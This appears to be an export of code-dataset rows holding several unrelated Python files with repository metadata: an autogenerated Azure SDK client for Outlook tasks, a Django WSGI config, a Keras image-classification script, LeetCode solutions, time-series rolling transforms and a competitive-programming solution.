# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models
if TYPE_CHECKING:
    # pylint: disable=unused-import,ungrouped-imports
    from typing import Any, Callable, Dict, Generic, List, Optional, TypeVar

    T = TypeVar('T')
    # Optional response-transform callback type used by all operations.
    ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]

class UsersOutlookTaskGroupsTaskFoldersTasksOperations(object):
    """UsersOutlookTaskGroupsTaskFoldersTasksOperations operations.

    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.

    :ivar models: Alias to model classes used in this operation group.
    :type models: ~users_actions.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """

    models = models

    def __init__(self, client, config, serializer, deserializer):
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config

    def complete(
        self,
        user_id,  # type: str
        outlook_task_group_id,  # type: str
        outlook_task_folder_id,  # type: str
        outlook_task_id,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> List["models.MicrosoftGraphOutlookTask"]
        """Invoke action complete.

        Invoke action complete.

        :param user_id: key: id of user.
        :type user_id: str
        :param outlook_task_group_id: key: id of outlookTaskGroup.
        :type outlook_task_group_id: str
        :param outlook_task_folder_id: key: id of outlookTaskFolder.
        :type outlook_task_folder_id: str
        :param outlook_task_id: key: id of outlookTask.
        :type outlook_task_id: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: list of MicrosoftGraphOutlookTask, or the result of cls(response)
        :rtype: list[~users_actions.models.MicrosoftGraphOutlookTask]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[List["models.MicrosoftGraphOutlookTask"]]
        # Map auth/404/409 status codes to the matching azure-core exceptions;
        # callers may extend/override via the 'error_map' kwarg.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        accept = "application/json"

        # Construct URL
        url = self.complete.metadata['url']  # type: ignore
        path_format_arguments = {
            'user-id': self._serialize.url("user_id", user_id, 'str'),
            'outlookTaskGroup-id': self._serialize.url("outlook_task_group_id", outlook_task_group_id, 'str'),
            'outlookTaskFolder-id': self._serialize.url("outlook_task_folder_id", outlook_task_folder_id, 'str'),
            'outlookTask-id': self._serialize.url("outlook_task_id", outlook_task_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        request = self._client.post(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        # Any non-200 response becomes a typed HTTP error with the parsed
        # OData error payload attached.
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(models.OdataError, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        deserialized = self._deserialize('[MicrosoftGraphOutlookTask]', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    complete.metadata = {'url': '/users/{user-id}/outlook/taskGroups/{outlookTaskGroup-id}/taskFolders/{outlookTaskFolder-id}/tasks/{outlookTask-id}/microsoft.graph.complete'}  # type: ignore
| [
"japhethobalak@gmail.com"
] | japhethobalak@gmail.com |
82955319c63241b4f150c0b4add43218c218c9b3 | 97dfda123c402f814986784dc2bf25d78431bece | /bizaarproject/wsgi.py | f19099b762b73612c3682fc2488f554d1297937f | [] | no_license | danmcc3557/CA1 | 729ecfd6163520ff642a58e8ef3abc41571ea71c | 343acc5d1aa5ca5ffc43db2ab832475664ecfc48 | refs/heads/master | 2023-09-05T09:36:29.972906 | 2021-11-16T15:57:33 | 2021-11-16T15:57:33 | 426,693,075 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 403 | py | """
WSGI config for bizaarproject project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os

from django.core.wsgi import get_wsgi_application

# Point Django at this project's settings module before building the app.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'bizaarproject.settings')

# Module-level WSGI callable that servers (gunicorn, mod_wsgi, ...) import.
application = get_wsgi_application()
| [
"="
] | = |
bd718c714e5759b6c8cb8d801d9ce9a6f8eb29ce | a1716a6ef649a843260fbfa4a66ccd8a6439094c | /Keras_L2_CNN/Week1_CNNclassification.py | 9484010243270d43cec294cc819919b4669e3534 | [] | no_license | pondjames007/TensorflowPractice | e28a8933303210c81c1c03edafe5036bff12f1b4 | e67df557cf383d74c7ec8a8cd009411b7cc5fd91 | refs/heads/master | 2020-07-12T10:59:01.284550 | 2020-01-15T20:41:56 | 2020-01-15T20:41:56 | 204,799,228 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,878 | py | """
Use CNN to do Classification
"""
import subprocess

# Download the cats-vs-dogs dataset archive by shelling out to wget.
subprocess.check_output(['wget', '--no-check-certificate',
                         'https://storage.googleapis.com/mledu-datasets/cats_and_dogs_filtered.zip',
                         '-O', './cats_and_dogs_filtered.zip'])

import os
import zipfile
import tensorflow as tf
# NOTE(review): `tensorflow._api.v1` is a private import path — TODO confirm
# it should not be the public `tensorflow.keras.*` equivalents.
from tensorflow._api.v1.keras.optimizers import RMSprop
from tensorflow._api.v1.keras.preprocessing.image import ImageDataGenerator

# The same as usual: unpack the dataset archive next to this script.
local_zip = './cats_and_dogs_filtered.zip'
zip_ref = zipfile.ZipFile(local_zip, 'r')
zip_ref.extractall('./')
zip_ref.close()

base_dir = './cats_and_dogs_filtered'
train_dir = os.path.join(base_dir, 'train')
validation_dir = os.path.join(base_dir, 'validation')

# Directory with our training cat pictures
train_cats_dir = os.path.join(train_dir, 'cats')
# Directory with our training dog pictures
train_dogs_dir = os.path.join(train_dir, 'dogs')
# Directory with our validation cat pictures
validation_cats_dir = os.path.join(validation_dir, 'cats')
# Directory with our validation dog pictures
validation_dogs_dir = os.path.join(validation_dir, 'dogs')

# Four conv/pool stages followed by a dense head; the final sigmoid unit
# outputs the probability of one of the two classes.
model = tf.keras.models.Sequential([
    tf.keras.layers.Conv2D(32, (3,3), activation='relu', input_shape=(150, 150, 3)),
    tf.keras.layers.MaxPooling2D(2, 2),
    tf.keras.layers.Conv2D(64, (3,3), activation='relu'),
    tf.keras.layers.MaxPooling2D(2,2),
    tf.keras.layers.Conv2D(128, (3,3), activation='relu'),
    tf.keras.layers.MaxPooling2D(2,2),
    tf.keras.layers.Conv2D(128, (3,3), activation='relu'),
    tf.keras.layers.MaxPooling2D(2,2),
    tf.keras.layers.Flatten(),
    tf.keras.layers.Dense(512, activation='relu'),
    tf.keras.layers.Dense(1, activation='sigmoid')
])

model.compile(loss='binary_crossentropy',
              optimizer=RMSprop(lr=1e-4),
              metrics=['acc'])

##########################################
# Data Preprocessing: rescale pixel values from [0, 255] to [0, 1].
train_datagen = ImageDataGenerator(rescale = 1/255)
test_datagen = ImageDataGenerator(rescale= 1/255)

# Flow training images in batches of 20 using train_datagen generator
train_generator = train_datagen.flow_from_directory(
    train_dir,  # This is the source directory for training images
    target_size= (150,150),  # All images will be resized to 150x150
    batch_size= 20,
    class_mode= 'binary'  # Since we use binary_crossentropy loss, we need binary labels
)

# Flow validation images in batches of 20 using test_datagen generator
validation_generator = test_datagen.flow_from_directory(
    validation_dir,
    target_size= (150,150),
    batch_size= 20,
    class_mode= 'binary'
)

history = model.fit_generator(
    train_generator,
    steps_per_epoch= 100,  # 2000 images = batch_size * steps
    epochs= 100,
    validation_data= validation_generator,
    validation_steps= 50,  # 1000 images = batch_size * steps
    verbose= 2
)
| [
"jameshuang@nyu.edu"
] | jameshuang@nyu.edu |
11dc59a1ed4fe55de8ea9b04875b8c923a194556 | 04a540847c1333c987a1957fd8d31197c594f6bb | /leetcode/617. Merge Two Binary Trees_1.py | 7f7c1b449e5502e4774a62f6c638faff9feb4958 | [] | no_license | k8440009/Algorithm | fd148269b264b580876c7426e19dbe2425ddc1ab | a48eba0ac5c9f2e10f3c509ce9d349c8a1dc3f0c | refs/heads/master | 2023-04-02T16:06:10.260768 | 2023-04-02T11:04:32 | 2023-04-02T11:04:32 | 200,506,643 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 671 | py | """
두 이진 트리 병합
- 재귀 탐색
"""
from typing import Optional
# Definition for a binary tree node.
class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val = val
        self.left = left
        self.right = right


class Solution:
    def mergeTrees(self, root1: Optional[TreeNode], root2: Optional[TreeNode]) -> Optional[TreeNode]:
        """Merge two trees by summing values where nodes overlap.

        Where only one tree has a node, that node is reused as-is.
        """
        # If either side is missing, the merge is simply the other side
        # (or None when both are absent).
        if root1 is None or root2 is None:
            return root1 or root2
        merged = TreeNode(root1.val + root2.val)
        merged.left = self.mergeTrees(root1.left, root2.left)
        merged.right = self.mergeTrees(root1.right, root2.right)
        return merged
| [
"k8440009@gmail.com"
] | k8440009@gmail.com |
ca14c4c9f925a129d4c8ddd3de75b5fb3e4c8267 | 3b1dc61a5d5f35e3e1ea612e21b160ce737dc85a | /dataprocess/transforms_v2.py | 22517d391bd2c6e4e88bc2f68cbf5b4fd43c1e43 | [] | no_license | ainklain/a_alloc | 2757c71347937c8ca62819bffca3a06506684851 | f9275d1bdf2a549e1d7fc4190e7fcfbe4526914a | refs/heads/master | 2023-05-09T14:16:29.509485 | 2021-06-01T06:11:06 | 2021-06-01T06:11:06 | 263,553,676 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,630 | py |
from abc import ABCMeta, abstractmethod
from functools import partial
import pandas as pd
import numpy as np
class BaseTransform(metaclass=ABCMeta):
    """Base class for all transforms; subclasses implement `forward`.

    Fix: ABCMeta was imported but never applied, so @abstractmethod had no
    effect and incomplete subclasses could be instantiated silently. With the
    metaclass in place, instantiating a class that lacks `forward` raises
    TypeError at construction time.
    """

    @abstractmethod
    def forward(self, x):
        """
        x : [n_timesteps, n_features]
        """
        pass

    def __call__(self, x):
        return self.forward(x)


class ToNumpy(BaseTransform):
    """Convert the input to a numpy array."""

    def forward(self, x):
        return np.array(x)


class RandomLike(BaseTransform):
    """Return standard-normal noise with the same shape as the input."""

    def forward(self, x):
        return np.random.randn(*x.shape)


class ToDataFrame(BaseTransform):
    """Wrap the input array in a DataFrame with fixed index/columns."""

    def __init__(self, idx, columns):
        self.idx = idx
        self.columns = columns

    def forward(self, x):
        return pd.DataFrame(x, index=self.idx, columns=self.columns)


class Rolling(BaseTransform):
    """Intermediate base: applies `func` over trailing windows of rows.

    Note: it does not implement `forward` itself, so it is abstract and only
    its concrete subclasses below can be instantiated.
    """

    def __init__(self, window):
        self.window = window

    def rolling(self, func, x):
        # The slice x[i-window : i+1] holds up to window+1 rows; near the
        # start of the series it shrinks to whatever history is available.
        n_timesteps, n_features = x.shape
        y = np.zeros_like(x)
        for i in range(n_timesteps):
            y[i, :] = func(x[max(0, i-self.window):(i+1)])
        return y


class RollingMean(Rolling):
    """Trailing-window mean per feature."""

    def __init__(self, window=500):
        super(RollingMean, self).__init__(window)

    def forward(self, x):
        return self.rolling(partial(np.nanmean, axis=0), x)


class RollingStd(Rolling):
    """Trailing-window sample standard deviation per feature."""

    def __init__(self, window=500):
        super(RollingStd, self).__init__(window)

    def forward(self, x):
        return self.rolling(partial(np.nanstd, ddof=1, axis=0), x)


class RollingMeanReturn(Rolling):
    """Trailing-window mean of one-step returns."""

    def __init__(self, window=500):
        super(RollingMeanReturn, self).__init__(window)

    def forward(self, x):
        return RollingMean(self.window)(RollingReturn(1)(x))


class RollingStdReturn(Rolling):
    """Trailing-window std of one-step returns."""

    def __init__(self, window=500):
        super(RollingStdReturn, self).__init__(window)

    def forward(self, x):
        return RollingStd(self.window)(RollingReturn(1)(x))


class RollingSharpe(Rolling):
    """Trailing-window mean/std ratio per feature."""

    def __init__(self, window=500):
        super(RollingSharpe, self).__init__(window)

    def forward(self, x):
        func = lambda x: np.nanmean(x, axis=0) / np.nanstd(x, ddof=1, axis=0)
        return self.rolling(func, x)


class RollingNormalize(Rolling):
    """Z-score of the window's last row against window statistics."""

    def __init__(self, window=500):
        super(RollingNormalize, self).__init__(window)

    def forward(self, x):
        func = lambda x: ((x - np.nanmean(x, axis=0)) / (np.nanstd(x, ddof=1, axis=0) + 1e-6))[-1, :]
        return self.rolling(func, x)


class RollingReturn(Rolling):
    """Simple return over each trailing window: last/first - 1."""

    def __init__(self, window=20):
        super(RollingReturn, self).__init__(window)

    def forward(self, x):
        func = lambda x: x[-1, :] / x[0, :] - 1.
        return self.rolling(func, x)


class RollingLogReturn(Rolling):
    """Log return over each trailing window: log(last/first)."""

    def __init__(self, window=20):
        super(RollingLogReturn, self).__init__(window)

    def forward(self, x):
        func = lambda x: np.log(x[-1, :] / x[0, :])
        return self.rolling(func, x)


class Transforms:
    """A list of (transform, suffix) pairs applied together."""

    def __init__(self, transforms_list=[]):
        self.transforms_list = transforms_list

    def sequential(self, x):
        """Pipe x through every transform in order, returning the last output."""
        for transforms_func, suffix in self.transforms_list:
            x = transforms_func(x)
        return x

    def apply(self, x, columns, reduce='none'):
        """Apply each transform to x independently.

        Returns the per-transform outputs and suffixed column names; with
        reduce='concat' the outputs are joined on the last axis and the
        column lists are flattened.
        """
        assert reduce in ['none', 'concat']
        y = []
        new_columns = []
        for transforms_func, suffix in self.transforms_list:
            y.append(transforms_func(x))
            new_columns.append(["{}_{}".format(c, suffix) for c in columns])

        if reduce == 'concat':
            y = np.concatenate(y, axis=-1)
            new_columns = sum(new_columns, [])

        return y, new_columns
| [
"ainklain@gmail.com"
] | ainklain@gmail.com |
01bf709b05693158964bc867aa127048a38a2d94 | caa16eb083841e91a70603653928564f9fd3fed2 | /Python/permutations.py | f224894c8305bff31d52e3959b9957db1d273725 | [] | no_license | guker/letcode | ea5198a3678c5f6ab2aebd61dc882153a4af1199 | a8c93ead3db7fe86c66b4aee9a8c67cc71cf95ec | refs/heads/master | 2021-01-24T04:08:33.839243 | 2015-08-11T11:19:24 | 2015-08-11T11:19:24 | 40,593,439 | 3 | 3 | null | null | null | null | UTF-8 | Python | false | false | 926 | py | # Time: O(n!)
# Space: O(n)
#
# Given a collection of numbers, return all possible permutations.
#
# For example,
# [1,2,3] have the following permutations:
# [1,2,3], [1,3,2], [2,1,3], [2,3,1], [3,1,2], and [3,2,1].
#
class Solution:
    # @param num, a list of integer
    # @return a list of lists of integers
    def permute(self, num):
        """Return every permutation of ``num`` via backtracking.

        Time O(n * n!), extra space O(n) beyond the output.
        """
        result = []
        used = [False] * len(num)  # used[i] marks num[i] as taken in cur
        self.permuteRecu(result, used, [], num)
        return result

    def permuteRecu(self, result, used, cur, num):
        # A full-length partial permutation is one complete answer.
        if len(cur) == len(num):
            result.append(cur[:])  # copy: cur is mutated while backtracking
            return
        # range instead of xrange: xrange is Python-2-only (NameError on
        # Python 3); range behaves identically here on both versions.
        for i in range(len(num)):
            if not used[i]:
                used[i] = True
                cur.append(num[i])
                self.permuteRecu(result, used, cur, num)
                cur.pop()          # undo the choice before trying the next
                used[i] = False
if __name__ == "__main__":
    # print(...) instead of the Python-2 print statement: the parenthesized
    # form is valid on Python 2 (prints the same single value) and required
    # on Python 3, where `print x` is a SyntaxError.
    print(Solution().permute([1, 2, 3]))
| [
"kamyu104@gmail.com"
] | kamyu104@gmail.com |
ed287ca023d35de1bf3c0f11d9c35b191d78a610 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03148/s414464368.py | d15bae3c7da7d8ff9d5dcb931e8bf5def1b30313 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 762 | py |
n, k = list(map(int, input().split()))
sushi = []
for i in range(n):
sushi.append(list(map(int, input().split())))
point = 0
sushi_kind = set()
duplication = []
sushi.sort(key=lambda x: x[1],reverse = True)
for i in range(k):
point += sushi[i][1]
if sushi[i][0] in sushi_kind:
duplication.append(sushi[i])
else:
sushi_kind.add(sushi[i][0])
ans = point + pow(len(sushi_kind),2)
dup_index = len(duplication) - 1
for i in range(k,n):
if sushi[i][0] in sushi_kind:
continue
else:
if dup_index >= 0:
point -= duplication[dup_index][1]
dup_index -= 1
point += sushi[i][1]
sushi_kind.add(sushi[i][0])
ans = max(ans, point + pow(len(sushi_kind),2))
print(ans)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.